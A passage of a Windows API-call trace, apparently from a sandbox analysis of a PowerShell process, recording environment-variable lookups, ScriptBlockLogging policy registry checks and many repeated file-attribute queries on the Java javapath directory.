Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0150.695] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0xafa508eb90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.865] EtwEventActivityIdControl () returned 0x0 [0150.865] EtwEventActivityIdControl () returned 0x0 [0150.865] EtwEventActivityIdControl () returned 0x0 [0150.874] EtwEventActivityIdControl () returned 0x0 [0150.874] EtwEventActivityIdControl () returned 0x0 [0150.878] EtwEventActivityIdControl () returned 0x0 [0151.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xafa508dab0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xafa508dab0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xafa508db10, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.128] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508ec18 | out: phkResult=0xafa508ec18*=0x0) returned 0x2 [0151.129] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508ec18 | out: phkResult=0xafa508ec18*=0x0) returned 0x2 [0151.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xafa508da60, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.139] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0xafa508e5b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xafa508e3b0, nSize=0x80 | out: lpBuffer="") returned 0x3a [0151.143] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xafa508e360, nSize=0x80 | out: lpBuffer="") returned 0x3a [0151.143] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xafa508e3d0, nSize=0x80 | out: lpBuffer="") returned 0x9d [0151.144] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xafa508e3a0, nSize=0x9d | out: lpBuffer="") returned 0x9c [0151.160] CoTaskMemAlloc (cb=0x20e) returned 0x2386b5996e0 [0151.160] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2386b5996e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.160] CoTaskMemFree (pv=0x2386b5996e0) [0151.163] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.163] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.165] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.177] CoTaskMemAlloc (cb=0x20e) returned 0x2386b5996e0 [0151.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2386b5996e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0151.178] CoTaskMemFree (pv=0x2386b5996e0) [0151.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.178] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.178] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.179] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.179] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.179] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.179] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.180] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.180] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.180] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.180] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.181] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.181] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.181] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.181] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.182] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.182] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.182] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.182] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.183] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.183] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.183] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.183] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.183] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.184] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.184] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.184] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.184] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.185] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.185] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.185] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.185] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.186] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.186] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.186] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.186] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.186] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.187] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.187] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.187] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.187] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.188] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common 